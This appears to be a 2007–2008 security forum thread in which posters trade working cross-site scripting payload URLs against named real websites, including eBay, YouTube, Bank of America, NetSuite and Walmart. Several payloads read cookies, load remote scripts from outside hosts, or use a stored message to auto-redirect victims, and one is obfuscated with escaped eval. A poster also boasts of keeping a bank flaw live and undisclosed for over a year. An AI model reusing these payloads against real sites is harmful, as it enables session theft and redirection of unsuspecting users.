This is a better formula Fugitif :)

hxxp://togo.ebay.com/app/auctionfinder.php?query=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&page&seller&category=&TZ=-120&block=list

www.teachertube.com

Nothing is checked. I can insert into picture URL, video comment, Firstname/ lastname, etc
click on first video:

hxxp://www.teachertube.com/view_video.php?viewkey=e6d0b40c72b279ebdf76



www.clipshare.com < clipshare software.
Login- Goto Send a message.
send a message with subject & body of:
>"><script>location="hxxp://www.geocities.com/timoleary71/"</script>
if the person tries to open there inbox, they don't even need to click on the message they get auto-redirected.. Also, you can put it inside the "Location Recorded" field of a video upload. Anytime someone tries to view the video...



Edited 3 time(s). Last edit at 12/08/2007 02:48AM by timoleary71.

Injection...


http://www.paxpartnership.org/calendar/index.cfm?fuseaction=ViewEventDetails&EventID=1
Inject into EventID...

hxxp://www.engadget.com/search/?q=test''\"onmouseover='alert(0)'style='position:absolute;top:-500px;left:-5000px;width:100000px;height:10000px;z-index:99999;'onerror="

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

This site is well guarded against XSS in every form and parameter.. but they didn't make sure to filter arbitrary parameter names

http://my.convio.com/?elqPURLPage=7&notaparameter=--%3E%3C/script%20v=b%3E%3Cscript%20src=%22http://ha.ckers.org/s%22%3E

-maluc

my uni https://cs7000a.uta.edu/logon?--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C!--a

-maluc

This was vaguely difficult to find due to some XSS protection in place, some browser dependencies and some unreliable server issues. This company just went public (sounds like a good company too, I might add). The URL is HTTPS, making it slightly more interesting (the XSS exploit works only in IE and pops up infinite alerts as long as your mouse is over the body of the page):

https://system.netsuite.com/pages/pwdreset.jsp?email=shopper%40nlcorp.com&answer1="style="width:expression(alert(document.cookie))&answer2=&answer3=&submitter=Submit

- RSnake
Gotta love it. http://ha.ckers.org

This is top Malaysia newspaper.

http://www.utusan.com.my/utusan/keyword_search.asp?NewString=<script>alert(1)</script>

a simple straight forward!!

krazl
www.krazl.com

http://www.krazl.com

http://www.stumbleupon.com/create_campaign.php?url=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cx=%22
http://www.youtube.com/comment_servlet?all_comments&v=IoXgRtDysLY&fromurl=%2f%2522%253E%253C/a%253E%253Cscript%253Ealert(1)%3b%253C/script%253E%253Cx=%2522

-g
[hiredhacker.com]

Very nice, gerry!

- RSnake
Gotta love it. http://ha.ckers.org

Thanks. Heres one for ebay too

http://pages.ebay.com/help/policies/index.html?fromFeature=Advanced%20Search%3C/a%3E%3CSCRIPT/**/SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E

It requires the user to have already visited ebay, or for the request to be reloaded as it is only displayed when there is a history. I need to look at the logic more to see it can be worked around, but figured if someone is interested they can do it ;)

-g
[hiredhacker.com]

hxxp://www.youtube.com/my_profile_organize?type="><script>alert("You%20must%20to%20be%20logged%20in%20to%20see%20this%20alert")</script>&user=Nemessis

You need to be logged in your youtube account.

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine

http://www.biguard.com/reg_emailverify.php?sn=1&e=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.gamefly.com/products/search.asp?k=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cp&pf=&sub=1&sb=mostpop&spsrch.x=0&spsrch.y=0
https://www.gamefly.com/member/reg0.asp?tp=&re=/member/account.asp?&pr=&p=0&gcid=&gctp=0&pue=&fc=&un=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&pw=&forgotpw=0&submit.x=0&submit.y=0
I was only here because I wanted to sign up for an account... but not anymore: http://www.gamefly.com/products/search.asp?k=&pf=0&cat=2&sb=mostpop&pg=1&letter='&s=&t=0&next.x=29&next.y=8

EDIT: Didn't feel like making a new post:
http://tell-a-friend-wizard.com/cgi-bin/tell_opt_gold.cgi?uid=%22%3E%3Cscript%3Ealert%28%27xss1%27%29%3C/script%3E&url=%22%3E%3Cscript%3Ealert%28%27xss2%27%29%3C/script%3E&captcha=%22%3E%3Cscript%3Ealert%28%27xss3%27%29%3C/script%3E

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/10/2008 05:16PM by tx.

Wanna go shopping? Just mouse over the search box.

http://walmart.ca/wps-portal/storelocator/Canada-FeaturedPage.jsp?selection=listing&tabId=22&&&categoryId=582&currentPage=5&departmentId=17&lang=&searchQuery=%22%20onmousemove=%22alert(1)%22%20size=%221&tabId=22

Identity theft protection:
https://www.selectidtheftprotection.com/scripts/externalpromo.asp?ref=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

-tx @ lowtech-labs.org

Is it possible to put goverment website here? Let me know rsnake...

krazl
www.krazl.com

http://www.krazl.com

There are several in this thread, go ahead.

-id

ch.tillate.com (dunno if that works on other country)

send message

Title: ')" onmouseover=alert(1); o

Works on firefox, didn't try on IE ^^

[configure.us.dell.com]
[ecomm.dell.com]

-g
[hiredhacker.com]

[www.nfl.com]
[www.nfl.com]
[www.patriots.com]
[www.patriots.com]

-g
[hiredhacker.com]



Edited 1 time(s). Last edit at 01/20/2008 07:01PM by gerry.

remove all spaces and replace all e by m which avoids Eval, iframE, String.fromCharCode, etc. etc.
Is this save? You all know ...

Quote

http://verivox.de/Power/Calculator.asp?31=on&No=40&51=on&52=on&54=on&lookup=true&leistungsmessung=no&radio1=1&plz=01234&11=31337%22onfocus=%22top['\145\166\141\154']('\144\157\143\165\155\145\156\164\56\167\162\151\164\145\154\156\50\47\74\142\157\144\171\76\74\163\143\162\151\160\164\40\163\162\143\75\42\57\57\150\141\56\143\153\145\162\163\56\157\162\147\57\163\42\76\74\57\163\143\162\151\160\164\76\74\57\142\157\144\171\76\47\51\73');&customer=priv&submit1=vergleichen

(uses onfocus)

Lesson learned: forget about any sanitation;-)

--
Edit: ubb's url tag is too stupid for sophisticated links:-/



Edited 1 time(s). Last edit at 02/01/2008 04:26AM by kirke.

hxxp://www.archive.org/search.php?query=%22%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
It's actually interesting that i had to put the " first, otherwise it would have remove every <
Some filters are actually strange :/

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 02/02/2008 06:30PM by nEUrOO.

This is for that crappy article: http://comments.cio.com/node/176250?page=%22%3Balert%28%27xss%27%29%3B//

-tx @ lowtech-labs.org

--Deleted by request--



Edited 4 time(s). Last edit at 07/01/2010 10:04AM by rsnake.

@tx

Hehe I like it nice1 :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

XSS via their open redirect page:
http://www.globalsecurity.org/cgi-bin/texis.cgi/webinator/search/redir.html?u=javascript%3Aalert%28document.domain%29%22onmouseover%3D%22alert%28document.cookie%29

-tx @ lowtech-labs.org

http://h-date.com/login.jsp?login=%22%3E%3Cscript%20src=%22http://bryanlies.com/x.js%22%3E%3C/script%3E&password=&Submit=Login
^ dont ask...

http://photobucket.com/mediadetail/?media=http://pic.photobucket.com/../logos/';alert(document.cookie);%3C/script%3E/PBLogo.166.BG.white.gif&searchTerm=&pageOffset=1
http://photobucket.com/mediadetail/?media=http://pic.photobucket.com/../logos/PBLogo.166.BG.white.gif&searchTerm=%22%3E%3Cscript/src=%22http://bryanlies.com/x.js%22%3E%3C/script%3E&pageOffset=1

oh, and hi.

http://www.bankofamerica.com/state.cgi?section=contact&update=yes&cookiecheck=yes&lob=asdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22%20k

This has been live and undisclosed for atleast over a year that i've had it saved.. still works ^^
I no longer have a BoA account to use it further, however.

-maluc